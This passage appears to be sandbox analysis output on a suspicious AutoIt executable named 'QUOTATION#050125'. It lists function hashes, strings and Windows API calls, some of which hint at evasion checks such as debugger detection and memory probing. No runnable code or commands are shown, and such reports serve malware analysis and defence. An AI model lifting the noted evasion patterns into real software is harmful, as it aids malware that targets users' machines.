                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Connection
                                                                                      • String ID: *$LPT
                                                                                      • API String ID: 1722446006-3443410124
                                                                                      • Opcode ID: 7039f87ec9b09b12817fa8916fc8713e988cb94a82325b3350d608bfc14dd945
                                                                                      • Instruction ID: 24ebeaa50edb660d248db61a0ccb75f3532bc65f69eb284c82933b61b7ac9c2f
                                                                                      • Opcode Fuzzy Hash: 7039f87ec9b09b12817fa8916fc8713e988cb94a82325b3350d608bfc14dd945
                                                                                      • Instruction Fuzzy Hash: CD916C75A002049FCB14DF58C484EAEBBF5BF49304F198099E84A9F3A2C775EE85CB90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #
                                                                                      • API String ID: 0-1885708031
                                                                                      • Opcode ID: 8187b00142ad664cfc25e8b2d44445ed6cfc520d7e5d66ade6b121dfa12f4fbb
                                                                                      • Instruction ID: 5ef1341e69ab29ea2f6c44a2419b71fb2108e780664abfd71c634dfaa6df2d66
                                                                                      • Opcode Fuzzy Hash: 8187b00142ad664cfc25e8b2d44445ed6cfc520d7e5d66ade6b121dfa12f4fbb
                                                                                      • Instruction Fuzzy Hash: D351E1359043869EEB19EFA8C481AFE7BE4EF55310F64406AEC519B2D1D7309D82CBA0
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(00000000), ref: 000DF2A2
                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 000DF2BB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                      • String ID: @
                                                                                      • API String ID: 2783356886-2766056989
                                                                                      • Opcode ID: 808a3428b67e5f424018dd9b21b56acb24ea369a41d4380c15a7adf652f861f4
                                                                                      • Instruction ID: 8ff3cce9c03feabd3c2b0badf5a327817842ebd4fe15aff87daa0fc1813827ce
                                                                                      • Opcode Fuzzy Hash: 808a3428b67e5f424018dd9b21b56acb24ea369a41d4380c15a7adf652f861f4
                                                                                      • Instruction Fuzzy Hash: 75513771408744ABE320AF14DC86BAFBBF8FB84300F81885DF1D941196EB718569CB67
                                                                                      APIs
                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?), ref: 000E3F6E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: EncodePointer
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 2118026453-2084237596
                                                                                      • Opcode ID: a6a1b7a9ed70cd41065b703479082daf4fc7a852ef305658c0f2bb7f78382cbb
                                                                                      • Instruction ID: e64d459648aefd9e6d18cd5cca39bbc12b79a35d6d318419297b0a72c6c0e836
                                                                                      • Opcode Fuzzy Hash: a6a1b7a9ed70cd41065b703479082daf4fc7a852ef305658c0f2bb7f78382cbb
                                                                                      • Instruction Fuzzy Hash: 08317A7190028AAFDF11DF55C885AADBBB5FF48304F1981A9FA1477252C338EE50CB61
                                                                                      APIs
                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00153621
                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0015365C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$DestroyMove
                                                                                      • String ID: static
                                                                                      • API String ID: 2139405536-2160076837
                                                                                      • Opcode ID: 61eb2e8f40b461d59de9f0ce001fcbd2a9dc15ba4997a9938c80d2b60b543017
                                                                                      • Instruction ID: c6f39ef7acc13139873eebce04692700a3a61c6ceb52cc5bc3c067ccae055ba4
                                                                                      • Opcode Fuzzy Hash: 61eb2e8f40b461d59de9f0ce001fcbd2a9dc15ba4997a9938c80d2b60b543017
                                                                                      • Instruction Fuzzy Hash: EF317A71110604AEDB109F28D880EFB73A9FF88761F10961DF8B59B290DB31A9869760
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0015461F
                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00154634
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: '
                                                                                      • API String ID: 3850602802-1997036262
                                                                                      • Opcode ID: 7fcfe72eb8cce06ef911cc510c994c06f78d5721caecdbc8de31160c7b98bb0a
                                                                                      • Instruction ID: 2e43ca9b1203facc0503bcc1d06375fa905289b2da9dc896bb1377f2a36fa5f0
                                                                                      • Opcode Fuzzy Hash: 7fcfe72eb8cce06ef911cc510c994c06f78d5721caecdbc8de31160c7b98bb0a
                                                                                      • Instruction Fuzzy Hash: 6D311674A0130AEFDB14CFA9C990BDA7BB5FB09305F10406AED14AB341E770A985CF90
                                                                                      APIs
                                                                                        • Part of subcall function 0014335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00143077,?,?), ref: 00143378
                                                                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0014307A
                                                                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00143106
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                      • String ID: 255.255.255.255
                                                                                      • API String ID: 2496851823-2422070025
                                                                                      • Opcode ID: 501d7f57d64639b8abfb233bef6e7deb496c7e982dab56119ad0fea881e2e220
                                                                                      • Instruction ID: a4e3dd74fed773adbd3ca7eebdfeab234d7cae1586d240215074856e37dda9e0
                                                                                      • Opcode Fuzzy Hash: 501d7f57d64639b8abfb233bef6e7deb496c7e982dab56119ad0fea881e2e220
                                                                                      • Instruction Fuzzy Hash: 5B31D335200301DFDB14CF68C585EAA77E0EF54318F258199E9259B7A2DB72EE45C760
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0015327C
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00153287
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: Combobox
                                                                                      • API String ID: 3850602802-2096851135
                                                                                      • Opcode ID: 9a247d441a60a5547de56ed437399b734c5015ca05fe7a2111df6b186ab3fda9
                                                                                      • Instruction ID: 45f4be2c4ef013517de6c0e189b89fecc169478a8b5c004bcb99ea0d336640dd
                                                                                      • Opcode Fuzzy Hash: 9a247d441a60a5547de56ed437399b734c5015ca05fe7a2111df6b186ab3fda9
                                                                                      • Instruction Fuzzy Hash: 7A11B271300608BFEF259F54DC80EFB376AEB943A5F104129F938AB290D7319D959760
                                                                                      APIs
                                                                                        • Part of subcall function 000C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000C604C
                                                                                        • Part of subcall function 000C600E: GetStockObject.GDI32(00000011), ref: 000C6060
                                                                                        • Part of subcall function 000C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C606A
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0015377A
                                                                                      • GetSysColor.USER32(00000012), ref: 00153794
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                      • String ID: static
                                                                                      • API String ID: 1983116058-2160076837
                                                                                      • Opcode ID: 521ad57226d8a94aad1ecf84798a4b8b519991dd7ebefc47e2353176ba285585
                                                                                      • Instruction ID: bb44183cfedf7894bee1570878b5663cfd9ad8706f2a466a09a1775c61e473ab
                                                                                      • Opcode Fuzzy Hash: 521ad57226d8a94aad1ecf84798a4b8b519991dd7ebefc47e2353176ba285585
                                                                                      • Instruction Fuzzy Hash: B11159B2A1020AEFDB00DFA8CC45EEA7BB8FB08345F004514FD65E7250E735E8559B50
                                                                                      APIs
                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0013CD7D
                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0013CDA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$OpenOption
                                                                                      • String ID: <local>
                                                                                      • API String ID: 942729171-4266983199
                                                                                      • Opcode ID: e6b5e2c621bd1fd984527b197a919a8a5bd24e59ea644c76b3f57ccdf2ef7cd8
                                                                                      • Instruction ID: ee290d228ee05edcdbb6aa1e288183b14e8bf88a2a9ae16061f54ade5f1a08a4
                                                                                      • Opcode Fuzzy Hash: e6b5e2c621bd1fd984527b197a919a8a5bd24e59ea644c76b3f57ccdf2ef7cd8
                                                                                      • Instruction Fuzzy Hash: 7D11C275205631BAD7384FA68C49EE7BEACEF127A4F00422AB109A7080D7709940D7F0
                                                                                      APIs
                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 001534AB
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001534BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                      • String ID: edit
                                                                                      • API String ID: 2978978980-2167791130
                                                                                      • Opcode ID: 30f2651b59b558c6f953a82a7177b2363e70cd088670b06efc3bbe9e526064d3
                                                                                      • Instruction ID: 5beccc9d688042092cdec4c695868b6844016ac3140560ec16448efe1616add5
                                                                                      • Opcode Fuzzy Hash: 30f2651b59b558c6f953a82a7177b2363e70cd088670b06efc3bbe9e526064d3
                                                                                      • Instruction Fuzzy Hash: D7116D71100208EFEB124E64DC44AEB376AEB153B5F504724FD719B1D0C771DD999750
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00121D4C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 3678867486-1403004172
                                                                                      • Opcode ID: ba0f74c944c152b7c4e8ac2413b45e3f5a899363919bf326e6030f56304ca1cb
                                                                                      • Instruction ID: aa5358293a4df2c7745149b34660b30f2803a207fc7e4139105acb24b16f1885
                                                                                      • Opcode Fuzzy Hash: ba0f74c944c152b7c4e8ac2413b45e3f5a899363919bf326e6030f56304ca1cb
                                                                                      • Instruction Fuzzy Hash: 8C01D875601228FBCB08EFE4EC59DFE7769EB66350B44091AF832573C2EB3059288760
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00121C46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 3678867486-1403004172
                                                                                      • Opcode ID: 7d12105283d3ef7ada983e907850633ab0d256fec9ff24f05d6ce34548604f56
                                                                                      • Instruction ID: 3865505470f60baca1d3fd0afd6397d4ee4423f644069c3e7eff138c64121e2d
                                                                                      • Opcode Fuzzy Hash: 7d12105283d3ef7ada983e907850633ab0d256fec9ff24f05d6ce34548604f56
                                                                                      • Instruction Fuzzy Hash: 1F0167756811187BCB18FB90E956EFF77A99B25340F140019A416772C2EB249F3C87B5
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00121CC8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 3678867486-1403004172
                                                                                      • Opcode ID: e08e11b215195d62e760495ac1e1a301e810f25ea35dc5b11eb81643b2220e97
                                                                                      • Instruction ID: 7f4740ebbab7bd4f1c9f65ac77f444f3086315226b7e81e964e64167b707a798
                                                                                      • Opcode Fuzzy Hash: e08e11b215195d62e760495ac1e1a301e810f25ea35dc5b11eb81643b2220e97
                                                                                      • Instruction Fuzzy Hash: AA01D67568022877CB04FBA0DA56EFE77A99B31340F540029B81273282EB209F38C7B1
                                                                                      APIs
                                                                                        • Part of subcall function 00123CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00123CCA
                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00121DD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 3678867486-1403004172
                                                                                      • Opcode ID: 6e87fb6a26dfb9950ba024ec428052cdcbf942f9d79cc4af0d3393a0bcbfe1fa
                                                                                      • Instruction ID: 3a26d6819d5d38b8a0739aa145ffdbb171f5be3535e7b42b8a82c896d23fdeb9
                                                                                      • Opcode Fuzzy Hash: 6e87fb6a26dfb9950ba024ec428052cdcbf942f9d79cc4af0d3393a0bcbfe1fa
                                                                                      • Instruction Fuzzy Hash: 58F0A971A41228B7D714FBE4DC5AFFE7768AB21350F440919B432672C2DB605A288660
                                                                                      APIs
                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00120B23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                      • API String ID: 2030045667-4017498283
                                                                                      • Opcode ID: 84c3bdf677e0da5b7c17cb71f3be10cd58c97f791f4e6e0c43ac4760eb23bd5a
                                                                                      • Instruction ID: b497d935ceefffc428ef07f9e164a95eecf8f1c96e060d0721c1ec1b944a6195
                                                                                      • Opcode Fuzzy Hash: 84c3bdf677e0da5b7c17cb71f3be10cd58c97f791f4e6e0c43ac4760eb23bd5a
                                                                                      • Instruction Fuzzy Hash: 65E0D8312443186ED2203B957C03FC97B85CF09F55F10446BFB58695C38BE2259046E9
                                                                                      APIs
                                                                                        • Part of subcall function 000DF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000E0D71,?,?,?,000C100A), ref: 000DF7CE
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,000C100A), ref: 000E0D75
                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,000C100A), ref: 000E0D84
                                                                                      Strings
                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000E0D7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                      • API String ID: 55579361-631824599
                                                                                      • Opcode ID: 156779dc952e715e7b1003198834865cce243b7c3e435bab9b8b8eee3315e589
                                                                                      • Instruction ID: 08ab6df9a05a67394b15aa1910d59a637a69fed563120ebcd7b97bef85a15c3b
                                                                                      • Opcode Fuzzy Hash: 156779dc952e715e7b1003198834865cce243b7c3e435bab9b8b8eee3315e589
                                                                                      • Instruction Fuzzy Hash: 5EE06D74204341CFD3609FB9D8087967BE0EB00745F01892DE892DAA52DBF5E4C8CBA1
                                                                                      APIs
                                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0013302F
                                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00133044
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Temp$FileNamePath
                                                                                      • String ID: aut
                                                                                      • API String ID: 3285503233-3010740371
